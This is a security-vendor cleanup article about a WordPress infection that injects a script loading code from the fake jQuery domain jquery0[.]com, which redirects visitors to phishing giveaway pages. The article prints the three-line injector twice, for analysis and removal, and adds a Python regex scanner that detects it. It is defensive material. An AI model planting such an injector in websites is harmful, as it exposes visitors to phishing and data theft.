Fix Fake jQuery Redirection to Scam Domain Visitors to jquery0.com
A new infection has been detected on several WordPress sites. It is delivered through a malicious script loaded from the domain https://jquery0[.]com/JkrJYcvQ.
If you have Norton antivirus installed and updated with the latest definitions, it will flag attempts to open this website.
When site visitors see the well-known jQuery name in the requests, they can get the impression that it’s okay to load the content. Regrettably, the domain in question is not a perfect match, and it exhibits malignant tendencies. Phishing and spamming campaigns frequently make use of this strategy to deceive victims into believing that the resources in question are genuine.
First things first, let’s have a look at the injection.
```javascript
var khutmhpx = document.createElement('script');
khutmhpx.src = 'https://jquery0[.]com/JkrJYcvQ';
document.getElementsByTagName('head')[0].appendChild(khutmhpx);
```
Let’s have a look at what this three-line piece of code is doing and break it down.
- To begin, the code creates a brand-new script tag and sets its src attribute to the address https://jquery0.com/JkrJYcvQ.
- Next, it appends that tag to the head of the currently displayed page, which causes the browser to fetch and run the script.
- The final step of the injection is the execution of the script hosted at https://jquery0.com/JkrJYcvQ, which redirects visitors to fraudulent websites.
This injection has been discovered in a variety of different WordPress files, including the following, for instance:
Investigating the potentially harmful website jquery0[.]com
Let’s take a more in-depth look at the malicious domain used in the script described above.
A lot can be learned about a domain by looking at the WHOIS record for https://jquery0.com.
In light of these findings, we can deduce the following:
- The domain name was only recently acquired (July 04, 2022).
- The site uses CloudFlare, which is frequently utilised by cybercriminals.
It’s important to note that the domain only uses CloudFlare for its name servers; it doesn’t make use of the CloudFlare firewall in any capacity. The IP address 220.127.116.11, located on a Russian CHANGWAY-AS network, can be accessed directly; see https://urlscan.io/ip/18.104.22.168.
Redirects Links to Fraudulent Online Pages
End users are tricked into providing their personal information by being led to fraudulent websites as soon as the malicious script has been activated on their computers. For instance, one of the variants offers the following hoax giveaway for an Apple iPhone 13 Pro:
When the victim clicks the “Ok” button, they are taken to a page where sensitive personal information is collected from them.
The use of a sense of urgency and a deadline is a typical tactic employed by cybercriminals on phishing websites in an effort to coerce potential victims into making a snap decision to provide their sensitive information.
However, this particular con is just one of many possible variations. Malwarebytes has recently discovered that this domain is also connected to the malware campaigns known as FakeUpdates and SocGholish.
Steps to Clean Website from JQuery0.com Infection
Once an attacker has acquired unauthorized access to a website, one of the most common tactics that they will take is to inject malicious scripts into the JS files and the files that make up WordPress.
Remove the script below from your JS files.
```javascript
var khutmhpx = document.createElement('script');
khutmhpx.src = 'https://jquery0[.]com/JkrJYcvQ';
document.getElementsByTagName('head')[0].appendChild(khutmhpx);
```
These scripts, which will fool end users into handing out their personal information, can be well disguised within the files that make up the core of WordPress as well as the files that make up plugins.
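To locate this injection across a WordPress install before removing it, the following scanner (added here as an example; it is not code from the original post or from any cleanup product) walks the file tree and reports every file and line containing a dynamically created script tag whose src points at jquery0[.]com. The variable name `khutmhpx`, the root directory and the file suffixes are assumptions; a constructed sample file is embedded so the script runs offline.

```python
import re
from pathlib import Path

# Pattern for the injection on this page: a <script> element created with
# createElement whose src is set to the fake jQuery domain. The variable name
# (khutmhpx here) differs between infections, so it is matched generically;
# curly quotes are accepted because copied samples often carry them, and the
# defanged form jquery0[.]com is accepted so IOC lists can be scanned too.
INJECTION_RE = re.compile(
    r"document\.createElement\(\s*[\"'\u2018\u2019]script[\"'\u2018\u2019]\s*\)"
    r".{0,200}?"                                   # variable name, ';', whitespace
    r"\.src\s*=\s*[\"'\u2018\u2019]https?://jquery0(?:\[\.\]|\.)com/",
    re.DOTALL | re.IGNORECASE,
)


def find_injections(text: str):
    """Return (line_number, snippet) for every injection found in file text."""
    hits = []
    for m in INJECTION_RE.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        hits.append((line_no, m.group(0)[:120]))
    return hits


def scan_tree(root: str, suffixes=(".js", ".php", ".html")):
    """Walk a directory (e.g. a WordPress root) and map infected files to hits."""
    findings = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        hits = find_injections(text)
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed sample: the injection from this page appended to a benign file.
SAMPLE = (
    "(function(){console.log('legit plugin code');})();\n"
    "var khutmhpx = document.createElement('script'); "
    "khutmhpx.src = 'https://jquery0.com/JkrJYcvQ'; "
    "document.getElementsByTagName('head')[0].appendChild(khutmhpx);\n"
)

if __name__ == "__main__":
    for line_no, snippet in find_injections(SAMPLE):
        print(f"line {line_no}: {snippet}")
    # On a real install: print(scan_tree("/var/www/html"))  # assumed path
```

A legitimate jQuery CDN loader does not match, because the domain check is anchored to jquery0 rather than to the jQuery name alone.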
- Make sure that your website’s plugins, themes, and software are all up to date. Always apply the most recent patch to get the most up-to-date protection against known software vulnerabilities.
- Conduct routine scans for malicious software and backdoors. This entails doing scans at both the server and client levels in order to detect any potentially harmful injections, SEO spam, or backdoors that might be hiding on your website.
- Always use a different password for each of your online accounts. This includes the credentials for sFTP, database, and cPanel users as well as admin users.
- Keep an eye on your logs for any indications of a security breach. Always keep an eye out for anything that seems odd or fishy, and give serious consideration to installing a file integrity monitoring system on your website.
- Invest in a web application firewall (WAF). A firewall can help reduce the impact of malicious bots, protect against brute force attacks, and identify intrusion attempts in your environment.
And if you feel that harmful scripts have been inserted into your site or that it has been compromised in any way, we are here to assist you. If you contact our customer care team for assistance, we will be able to remove the malware on your behalf.